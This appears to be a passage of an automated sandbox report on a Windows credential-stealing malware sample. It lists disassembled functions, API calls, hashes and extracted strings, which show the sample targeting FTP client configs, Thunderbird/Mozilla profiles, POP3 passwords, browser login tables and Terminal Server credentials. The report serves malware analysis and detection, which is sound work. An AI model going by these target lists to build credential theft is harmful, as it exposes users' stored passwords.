                                  • Opcode ID: cedef4814950fecef028693fde83b0cfb1c82021b2be3e490c35e8f8880a7309
                                  • Instruction ID: a429c4077cf35c25440d6dd763033275fbd814fdd036323c4685f88714ea5c3a
                                  • Opcode Fuzzy Hash: cedef4814950fecef028693fde83b0cfb1c82021b2be3e490c35e8f8880a7309
                                  • Instruction Fuzzy Hash: 4C41F771D00209EAEF11AFE5CC41BEEBEB9EF08346F10803AF510B52A1D7B95A55DB19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: IsRelative$Path$Profile$profiles.ini
                                  • API String ID: 0-4107377610
                                  • Opcode ID: 599b44bedf40f5752f226e6691e64bb6f2b056099a629093744a2b2310412121
                                  • Instruction ID: 5ee8cadbbd8b00acdf57b7c0c8cba141a4701fb156d17687039a110dfaec4fae
                                  • Opcode Fuzzy Hash: 599b44bedf40f5752f226e6691e64bb6f2b056099a629093744a2b2310412121
                                  • Instruction Fuzzy Hash: 97412C31A40146BADF227BA1DC02EAE7F72AF51314F14457BB510741E2DBBE9E90AB09
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00404478
                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00404490
                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004044A1
                                  • GetCurrentProcess.KERNEL32(00000000,00000000,IsWow64Process,00000000,GetNativeSystemInfo,kernel32.dll), ref: 004044B0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$CurrentHandleModuleProcess
                                  • String ID: GetNativeSystemInfo$IsWow64Process$kernel32.dll
                                  • API String ID: 977827838-3073145729
                                  • Opcode ID: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                  • Instruction ID: b4fabcce51f297447bc7e22879592c7cf0400204f4cc9062f02e0cb4fe293c57
                                  • Opcode Fuzzy Hash: 52fa25a1187148b6aa2af6f699f797c343cf269405537120f34093dc550733a4
                                  • Instruction Fuzzy Hash: C4F0547271020466C710B2B96C45BDF269887C03A6F290A37F105F22C1E9FCDD858278
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <setting name="$value="
                                  • API String ID: 0-3468128162
                                  • Opcode ID: bda3d99004fb4f8a403e20f71ab17ce9c426a6f979947023c5f12a12419d8640
                                  • Instruction ID: 73fa1e58b4d6e0f5acaca6cd35f95d233c17529f6f8bb818b449ef047748446b
                                  • Opcode Fuzzy Hash: bda3d99004fb4f8a403e20f71ab17ce9c426a6f979947023c5f12a12419d8640
                                  • Instruction Fuzzy Hash: B0319272D0425A9ECF11BBE58C419EEBFB19F15318F1440B7E450B2291D6B84A84D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ExitProcess.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000010,?,?,00404171,00000000,004094F8,00000000,?), ref: 0040201E
                                  • GetFileSize.KERNEL32(00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000010,?,?,00404171,00000000,004094F8), ref: 0040202B
                                  • CreateFileMappingA.KERNEL32(00000000,00000000,00000002,00000000,00000000,00000000), ref: 0040203F
                                  • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000010), ref: 00402054
                                  • CloseHandle.KERNEL32(?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,00000000), ref: 00402063
                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000004,00000000,00000000,00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 0040206A
                                  • CloseHandle.KERNEL32(00000000,00000001,00000000,?,80000000,00000003,00000000,00000003,00000000,00000000,00000000,00000010,?,?,00404171,00000000), ref: 00402079
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandle$CreateExitMappingProcessSizeView
                                  • String ID:
                                  • API String ID: 3150701006-0
                                  • Opcode ID: 5dd866bb0e6c33b306a07bd0ceb850c01bc8838f38ceacfdec42ac2a57ae0e1a
                                  • Instruction ID: d399f326a401a41e3911470efd7f2dd0ea8cd6c92bc63ed3790d9b1a64691747
                                  • Opcode Fuzzy Hash: 5dd866bb0e6c33b306a07bd0ceb850c01bc8838f38ceacfdec42ac2a57ae0e1a
                                  • Instruction Fuzzy Hash: DD114070680301B7EF312F71CC87F553A94AB41B58F20816677547D1D6DAF998A0861C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrlen.KERNEL32(00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E6D
                                  • lstrlen.KERNEL32(00000000,00000000,?,?,00409D0C,00000000,?,?,00414845,?,?,?,?,00000000,00000000,00000000), ref: 00401E77
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00401E8B
                                  • lstrcat.KERNEL32(00000000,00000000), ref: 00401E94
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$lstrcatlstrcpy
                                  • String ID: GHA$GHA$GHA
                                  • API String ID: 2414487701-3381011476
                                  • Opcode ID: 594e310830b37fdcfabbb09cfd9026ad88f7d14825e8ea954330a260733d6da2
                                  • Instruction ID: d9246f528be96856b322303a71286aa71aff6bea291017c40e37798af4e07103
                                  • Opcode Fuzzy Hash: 594e310830b37fdcfabbb09cfd9026ad88f7d14825e8ea954330a260733d6da2
                                  • Instruction Fuzzy Hash: DAF03A75500208BEDF013F62CC85ADD3A9AEB50358F00C53BB8192A262D7BD8AD48B88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: ftp://$http://$https://
                                  • API String ID: 0-2804853444
                                  • Opcode ID: e62c7233ddaf23a97de237f1f02d5fbb91d97dc4560d5de1e3efdb261fcceb1f
                                  • Instruction ID: 81f334c42a3cb0fc056165a4037353c858dea4867f82d2d186d61bdc58b91dcb
                                  • Opcode Fuzzy Hash: e62c7233ddaf23a97de237f1f02d5fbb91d97dc4560d5de1e3efdb261fcceb1f
                                  • Instruction Fuzzy Hash: 2E61F872800109FEDF11AF91CD45AEEBBB9EB04348F10807BB841B51A1DB798B95DB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: "/>$winex="
                                  • API String ID: 0-1498080979
                                  • Opcode ID: af141e6ca81ad0c62c274a93df11e371c4a6ffbe9cdeab3068eebc9604492fd4
                                  • Instruction ID: a65735a88df2e3c906ae4414ece12a79dd6024024b2867e7669953596bd514cb
                                  • Opcode Fuzzy Hash: af141e6ca81ad0c62c274a93df11e371c4a6ffbe9cdeab3068eebc9604492fd4
                                  • Instruction Fuzzy Hash: 43313E3290401ABEDF12ABA2CC02DEE7E76AF44344F10483BF501B51F1D7798A61EB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(006538A0,FTPCON), ref: 0040819B
                                  • StrStrIA.SHLWAPI(00653BC0,FTP CONTROL,00000000,006538A0,FTPCON), ref: 004081A7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: .prf$FTP CONTROL$FTPCON$\Profiles
                                  • API String ID: 0-2908215140
                                  • Opcode ID: 4c0d51b62a3c4ef132449359e253ed5f20a19cbf5f9a9553fd36cdd625536b2b
                                  • Instruction ID: 25b8ca94bf750d55a6aec51c2f4f4f00567277a79abcf93635d07a7db2700455
                                  • Opcode Fuzzy Hash: 4c0d51b62a3c4ef132449359e253ed5f20a19cbf5f9a9553fd36cdd625536b2b
                                  • Instruction Fuzzy Hash: A8018070600205BADB127A259D02FDF7A59DF81314F34413BB995791E2EA7C5A8292AC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • 756D19A0.OLE32(?,?), ref: 00401A3A
                                  • GlobalFix.KERNEL32(?), ref: 00401A55
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • GlobalUnWire.KERNEL32(?), ref: 00401A7D
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalLocal$AllocFreeWirelstrlen
                                  • String ID: CRYPTED0YUI1.0
                                  • API String ID: 165658394-1217275205
                                  • Opcode ID: 0b9a0f1d4f664bafb713aef1ca1f85e26cb5ccba4b0790a3093215a2a3197274
                                  • Instruction ID: 291b1819b17b0b52e8b302f92d65d305c822eefb8dbf6a76828d30f87d665d9c
                                  • Opcode Fuzzy Hash: 0b9a0f1d4f664bafb713aef1ca1f85e26cb5ccba4b0790a3093215a2a3197274
                                  • Instruction Fuzzy Hash: A1118671D00108BADF026FA1CC429DD7F7AEF44348F008076B915B51B1D77A8AA5AB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • 756D19A0.OLE32(?,?,0040FB29), ref: 0040FB39
                                  • GlobalFix.KERNEL32(?), ref: 0040FB5A
                                  • GlobalUnWire.KERNEL32(?), ref: 0040FB72
                                  • StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Global$Wire
                                  • String ID: STATUS-IMPORT-OK
                                  • API String ID: 427882606-1591331578
                                  • Opcode ID: 3b81691f12b9029d55f690511d23c3277f1049611a8634ab331864a2b30694c1
                                  • Instruction ID: 90cea658c6c8212aa9fef009ba96f0a063fbcad0abcecaf4235fdd33f3ce5274
                                  • Opcode Fuzzy Hash: 3b81691f12b9029d55f690511d23c3277f1049611a8634ab331864a2b30694c1
                                  • Instruction Fuzzy Hash: B0012135D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBA9E949B58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E19
                                    • Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,00000000,?,?,00409D03,?,00414845,?,?,?,?,00000000,00000000,00000000,00000000), ref: 00401E23
                                    • Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,00000000), ref: 00401E37
                                    • Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40
                                  • lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                  • StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                  • StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$lstrcatlstrcpy
                                  • String ID: .exe
                                  • API String ID: 2414487701-4119554291
                                  • Opcode ID: 8bdeb51ab4562ce6dc25a7659f3da278b641286cec14c205c6ccf4aa3e72aee0
                                  • Instruction ID: f255478a9709c47b6028815859772bdce8d28858f668d5172353d83d27d3e8c2
                                  • Opcode Fuzzy Hash: 8bdeb51ab4562ce6dc25a7659f3da278b641286cec14c205c6ccf4aa3e72aee0
                                  • Instruction Fuzzy Hash: F4F0C83120429269DB2132268C09F6F6F859B92744F14003BF640B72D3D7FC989297BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: <POP3_Password2
                                  • API String ID: 0-2923094552
                                  • Opcode ID: 7b1cc17d0db518ec0d8fd73db9fd4e22c5d0ff00df7bd1dc43ec9f178fbe58f5
                                  • Instruction ID: 81c7923d4842b803ad45ce7413c013c6613b7a06965b9ff00af2c8356a2977a1
                                  • Opcode Fuzzy Hash: 7b1cc17d0db518ec0d8fd73db9fd4e22c5d0ff00df7bd1dc43ec9f178fbe58f5
                                  • Instruction Fuzzy Hash: 7C416031900019BEDF12ABA2DC01CEEBE76EF58354B144837F501B61A1D77A4E61EBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
                                  • StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharLocalMultiWidelstrlen$AllocFree
                                  • String ID:
                                  • API String ID: 1890766102-0
                                  • Opcode ID: 20b0a6c46fb23dc533a2f6930df4f36dc9e071e66da9dea0d5ba9855031d485b
                                  • Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
                                  • Opcode Fuzzy Hash: 20b0a6c46fb23dc533a2f6930df4f36dc9e071e66da9dea0d5ba9855031d485b
                                  • Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(00653BC0,FTP Navigator), ref: 00405BEE
                                  • StrStrIA.SHLWAPI(00653BC0,FTP Commander,00653BC0,FTP Navigator), ref: 00405C1C
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?,?), ref: 0040243F
                                    • Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?,PathToExe,00000000,?), ref: 0040245E
                                    • Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?,?), ref: 00402470
                                    • Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?,?,00000000,?,?,?,00409C6E,00000000,00000000,?), ref: 00402482
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$FreeLocal
                                  • String ID: FTP Commander$FTP Navigator$ftplist.txt
                                  • API String ID: 1884169789-2424314702
                                  • Opcode ID: 3f20d301ba977c63df3f8eaf8dee310e0c613c7a7ef2ff7ec2e3d954ae70b1f2
                                  • Instruction ID: 36e39a21a9329dbe8d23580b16dfc1acef3c6298e5863b6ab1a3678991a917a5
                                  • Opcode Fuzzy Hash: 3f20d301ba977c63df3f8eaf8dee310e0c613c7a7ef2ff7ec2e3d954ae70b1f2
                                  • Instruction Fuzzy Hash: 1401C870504511FAEB1136228C02FEF3E5ADB82354F24413BB854751E6D77C5FC29AAC
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • StrStrIA.SHLWAPI(006538A0,FTPNow), ref: 0040D017
                                  • StrStrIA.SHLWAPI(006538A0,FTP Now,006538A0,FTPNow), ref: 0040D028
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: FTP Now$FTPNow$sites.xml
                                  • API String ID: 0-284577462
                                  • Opcode ID: b496e445b2f1713c17a9afc3aca1a074b6710dfc6436eba6b403963c8e4a1dca
                                  • Instruction ID: ec990e8c8fde0540a055802f0a5bafa42fe6efae90b5ffc829ae8747faa2dcf0
                                  • Opcode Fuzzy Hash: b496e445b2f1713c17a9afc3aca1a074b6710dfc6436eba6b403963c8e4a1dca
                                  • Instruction Fuzzy Hash: 04F08670900101B5DB3136758C42FAF3A999B8275CF14413BB928B11E6E6BCCEC692AD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5A7
                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?,000000FF,00000000,00000000), ref: 0040C5C9
                                  • StgOpenStorage.OLE32(?,00000000,00000012,00000000,00000000,?,00000000,00000000,?,000000FF,?,?,?,00000000,00000000,?), ref: 0040C5DD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ByteCharMultiWide$OpenStorage
                                  • String ID: Settings
                                  • API String ID: 2489594185-473154195
                                  • Opcode ID: 5a22c04cb07e7055a5d0bf576c286a9d7239e1d69989192e29595e67d1c7dee0
                                  • Instruction ID: 45371d5192e4b28a761186b6385347240049983ed8c7a30cfb32e2f7b06d0ba5
                                  • Opcode Fuzzy Hash: 5a22c04cb07e7055a5d0bf576c286a9d7239e1d69989192e29595e67d1c7dee0
                                  • Instruction Fuzzy Hash: E431CC31A4010AFBEF11AFA1CC42F9EBB76BF04704F208676B611791F1D7759A50AB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • 756D19A0.OLE32(?,?), ref: 004017E5
                                  • GlobalFix.KERNEL32(?), ref: 00401800
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • GlobalUnWire.KERNEL32(?), ref: 0040185E
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Strings
                                  • PKDFILE0YUICRYPTED0YUI1.0, xrefs: 0040186D
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalLocal$AllocFreeWire
                                  • String ID: PKDFILE0YUICRYPTED0YUI1.0
                                  • API String ID: 3297799765-258907703
                                  • Opcode ID: f50359b7dc1b543987db6d9ae40c1b20d3b09eab9be43a1e559df76cc7c9260f
                                  • Instruction ID: ebbbe2b59391e3aaee2ab6b6a4edf92b2b65332d5e813d2d7ef502307b157ca4
                                  • Opcode Fuzzy Hash: f50359b7dc1b543987db6d9ae40c1b20d3b09eab9be43a1e559df76cc7c9260f
                                  • Instruction Fuzzy Hash: E921EC72D00109BBEF017FE1CC42AAD7E76EF10344F10807ABA10751B1E77A9A609B98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 0040F84D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CurrentDirectory
                                  • String ID: Software\Mozilla$Thunderbird$\Thunderbird
                                  • API String ID: 1611563598-138716004
                                  • Opcode ID: 3900f61e60242ede110ebd0f51d325dc5948dbb92c24ca90039318ddb8749326
                                  • Instruction ID: 8fbb6025bf1bae38e9f8b15fc4f9f4680cacf0d291e8fae410ec338ccf0d0a68
                                  • Opcode Fuzzy Hash: 3900f61e60242ede110ebd0f51d325dc5948dbb92c24ca90039318ddb8749326
                                  • Instruction Fuzzy Hash: 91E08C30644308BEDB10AF54CC83FC93A75A700B44F108026BB09692E3EBF89A809B88
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: http://$https://
                                  • API String ID: 0-1916535328
                                  • Opcode ID: 5cd760852aa39f782b765e61b906560e06cdc58d73b3cb5e51cde6ffd92becd4
                                  • Instruction ID: 36914738dcc24f5284e4ebbc1b9eef358293ae7963248e41ec2cf401613fd4ce
                                  • Opcode Fuzzy Hash: 5cd760852aa39f782b765e61b906560e06cdc58d73b3cb5e51cde6ffd92becd4
                                  • Instruction Fuzzy Hash: 6C411931800109FADF12AF91CE05BDE7BB6AF40358F10853AB551791F1CB7A4B90EB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • lstrcmpiA.KERNEL32(00000000,logins), ref: 0040BE49
                                  • lstrcmp.KERNEL32(table,?), ref: 0040BE7E
                                    • Part of subcall function 0040BAF7: StrStrIA.SHLWAPI(?,() ), ref: 0040BB07
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcmplstrcmpi
                                  • String ID: logins$table
                                  • API String ID: 3524194181-3800951466
                                  • Opcode ID: 7f28558af844e74c1819305582bf043a1b5382ff8d0011c42be08ad023800f45
                                  • Instruction ID: 4e1aa7e609f9c63133400eaf0fbab0bfe716398796ba7bb72f53a7a8be838654
                                  • Opcode Fuzzy Hash: 7f28558af844e74c1819305582bf043a1b5382ff8d0011c42be08ad023800f45
                                  • Instruction Fuzzy Hash: FB31E97581020EFACF21DF94CC469EEBB79EB04328F204276A121B61E0D7759A54DF9C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00401AF6
                                  • 756D19A0.OLE32(?,?), ref: 00401B0F
                                  • GlobalFix.KERNEL32(?), ref: 00401B2A
                                    • Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,?,?,00409CB2,00000800,?,?), ref: 004018DD
                                  • GlobalUnWire.KERNEL32(?), ref: 00401B52
                                    • Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,00409D40,?,00000800), ref: 004018C4
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_1_2_400000_BW38j8Jkbl.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: GlobalLocal$AllocCountFreeTickWire
                                  • String ID:
                                  • API String ID: 2192416133-0
                                  • Opcode ID: 836879ef981522b62778e60a55e3bcca01e904f5077eaad28ede8447ce5f4bdc
                                  • Instruction ID: 621e9e9be75d07b42097c487be39cb2d33a31aa4828135fb6f0f97c2ff2c831f
                                  • Opcode Fuzzy Hash: 836879ef981522b62778e60a55e3bcca01e904f5077eaad28ede8447ce5f4bdc
                                  • Instruction Fuzzy Hash: 21219875D0010CBEDF01AFA1DC429DDBB7AAF04344F0040B6BA15B51B1DB799BA5AB98
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                    • Part of subcall function 004015CB: lstrlen.KERNEL32(00000000,?,00409772,?,00000000,?,BEEF0000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?), ref: 004015D7
                                  • StrStrIA.SHLWAPI(?,0041679F,?,?,?,?,?,?,?,?,BEEF0000), ref: 0040CC68
                                  • lstrlen.KERNEL32(TERMSRV/,?,0041679F,?,?,?,?,?,?,?,?,BEEF0000), ref: 0040CC76
                                  • StrStrIA.SHLWAPI(?,TERMSRV/,TERMSRV/,?,0041679F,?,?,?,?,?,?,?,?,BEEF0000), ref: 0040CC86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  Joe Sandbox IDA Plugin
